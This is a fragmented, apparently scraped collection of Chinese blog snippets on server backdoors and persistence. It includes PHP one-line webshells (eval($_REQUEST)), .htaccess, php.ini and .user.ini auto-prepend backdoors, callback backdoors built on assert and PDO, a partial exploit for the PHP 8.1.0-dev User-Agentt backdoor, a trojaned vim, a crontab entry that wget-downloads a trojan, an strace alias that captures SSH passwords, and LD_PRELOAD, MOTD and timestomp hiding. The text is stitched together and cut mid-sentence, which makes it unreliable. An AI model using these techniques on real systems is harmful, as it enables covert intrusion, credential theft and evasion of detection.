> 4、不死马 不死马会删除自身,以进程的形式循环创建隐蔽的后门。 <?...5、中间件后门 将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。...> 7、利用 .htaccess 文件构成PHP后门 一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。... SetHandler application/x-httpd-php 8、利用 php.ini 隐藏后门文件 php.ini 中可以指定在主文件执行前后自动解析的文件名称...,常用于页面公共头部和尾部,也可以用来隐藏php后门。
php @eval($_REQUEST[1]);?^> > index.php:shell.jpg 这样就生成了一个不可见的 index.php:shell.jpg ?...file_put_contents('webshell.php','clear'); sleep(1); } 五. php.ini后门 将下面后门写入php.ini allow_url_include...php @eval($_REQUEST[cmd]);?> // 后门类型可自己修改。 ? 后门留好后,需要重启 web 服务。 方法1....方法2.就是加载一个 php_socke.php 脚本,让他重新加载 php.ini 脚本如下: <?...但是如图这个 php 版本测试成功。 ? 这个后门在任何的 PHP 页面都可以用菜刀连接: ?
双参数回调后门 在 PHP5.4.8+ 版本中,assert 有一个新的可选参数 descrition。...加上一行代码: I('post.ph0rse','',I('get.i')); 就可以传递 GET 参数:i=assert, POST 参数 ph0rse=你的命令 并且可以远连菜刀~ 同样,通过审计,在其它开源框架中其实也可以发现类似的留后门技巧...后话 真正的后门,要靠系统层 对于 PHP 后门来说,如果能做到隐蔽性,不会被D盾等工具自动检测出来。人工查看时,一时半会儿也看不出有问题,其实就够了。...受限于运维的日志审查,通过 PHP 去进行后渗透不太现实,PHP 后门最大的意义在于,留有一个通道。等其它通道关闭或者网站迁移(总要移代码吧)时,能够维持对目标站的控制。...但可以保证,这些姿势我都试过,复现起来是完全 OK 的~ 跳出 PHP,讨论后面的话,就比较复杂了,从悄咪咪留后门,到秘密管理后门、窃听数据,再到清理痕迹~各种姿势,千方百怪,前几天还学到了利用微信客户端来留后门远控的
根据上面这个pdo的一句话,我就可以得到一个很具有普适性的结论:php中包含回调函数参数的函数,具有做后门的潜质。 我就自己给这类webshell起了个名字:回调后门。...也算作回调后门的一种。 0x06 单参数后门终极奥义 preg_replace、三参数后门虽然好用,但/e模式php5.5以后就废弃了,不知道哪天就会给删了。...如果是php5.3以下的,使用sqlite_*函数,自己研究我不列出了。 这两个回调后门,都是依靠php扩展库(pdo和sqlite3)来实现的。...其实如果目标环境中有特定扩展库的情况下,也可以来构造回调后门。 比如php_yaml: <?...实际上,回调后门是灵活且无穷无尽的后门,只要php还在发展,那么就有很多很多拥有回调函数的后门被创造。想要防御这样的后门,光光去指哪防哪肯定是不够的。
: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。...php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:PHP_INI_SYSTEM、PHP_INI_PERDIR、PHP_INI_ALL、PHP_INI_USER。...不过,我们可以很容易地借助.user.ini文件来构造一个“后门”。 Php配置项中有两个比较有意思的项(下图第一、四个): ?...目录下有.user.ini,和包含webshell的01.gif,和正常php文件echo.php: ? ? 访问echo.php即可看到后门: ? Nginx下同样: ? ?...不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。
0x00:简介 PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。...当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。...0x01:搭建环境 https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor 然后访问本地地址 http://127.0.0.1:8080...requests.Session() def checkTarget(args): r = s.get(args.url) for h in r.headers.items(): if "PHP
漏洞背景 PHP(Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。...PHP语法利用了C、Java和Perl,该语言的主要目标是让web开发人员快速编写动态网页。...前段时间,监测到PHP官方发布通告称,有人入侵了PHP编程语言的官方Git服务器,并提交了包含后门文件的更新包。...漏洞原理 该事件是黑客利用具有git权限的账户提交了一个恶意commit,给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行,则将允许未经授权的访问者执行他们选择的代码。...利用该后门,攻击者可以执行任意命令,对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。
:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障...后门 4.1.1.1. php.ini构成的后门 利用 auto_prepend_file 和 include_path 4.1.1.2. .htaccess后门 php_value auto_append_file...后门 .user.ini可运行于所有以fastcgi运行的server。...PHP序列化实现 PHP序列化处理共有三种,分别为php_serialize、php_binary和 WDDX,默认为php_serialize,可通过配置中的 session.serialize_handler...php自身在解析请求的时候,如果参数名字中包含” “、”.”、”[“这几个字符,会将他们转换成下划线,讲了那么多渗透测试中PHP后门的安全检测方法,那么如果对此有需求的朋友可以咨询专业的网站安全公司来做渗透测试
28日与后门一起发布,但是后门很快被发现并删除。...0x02 漏洞概述 PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。...0x03 影响版本 PHP 8.1.0-dev 0x04 环境搭建 使用vulhub进行搭建: cd vulhub/php/8.1-backdoor sudo docker-compose up...参考链接: https://news-web.php.net/php.internals/113838 https://github.com/vulhub/vulhub/tree/master/php/...8.1-backdoor https://www.php.net/
于是黑白的较量变成了黑帽不断的构造变形的后门,去隐蔽特征,而白帽则不断的更新过滤方法,建起更高的城墙。 一、原理简述 对于不同的语言有不同的构造方法。...而在PHP 后门的变形之路上,远远不止这些,甚至可以自己定义一个加密解密的函数,或者是利用xor, 字符串翻转,压缩,截断重组等等方法来绕过。 三、变形改良 1.404页面隐藏木马 <!...如果在404页面挂上了一句话后门,一方面不会被发现,另一方面,黑帽子很容易能定位到并连接上服务器。 2.无特征隐藏PHP后门 利用session: <?...,会构造一个会话,进到后门1.php那里。...守方:分析各种各样的函数,寻找有效的特征码来防止后门。 黑帽子大牛:深入web框架内核,挖掘出代码缺陷,构造出复杂的后门利用。
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...调试性能问题,查看系统调用的频率,找出耗时的程序段 查看程序读取的是哪些文件从而定位比如配置文件加载错误问题 查看某个php脚本长时间运行“假死”情况 当程序出现“Out of memory”时被系统发出的...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...后门 ?
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...为了保证时间的准确性,操作系统一般会有时间同步的服务,也就是NTP服务,来让系统时间更加准确 详细知识可以查看鸟哥的网站 http://cn.linux.vbird.org/linux_server/0440ntp.php...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi echo 'echo -e ...
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...18.04中 motd 的动态脚本都在 /etc/update-motd.d/这个目录下 这些脚本动态的组合成了我们上面看到的那么 Banner 信息 这些文件只允许 root 用户编辑,所以使用此后门需要先获取...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...,但是考虑很多兄弟没看过之前的文章,所以这次重提一下 这个点说透以后,能用来做后门的可就不止 motd 这一个组件了,你可以想象一下,得有多少地方会使用 source或 .
领取专属 10元无门槛券
手把手带您无忧上云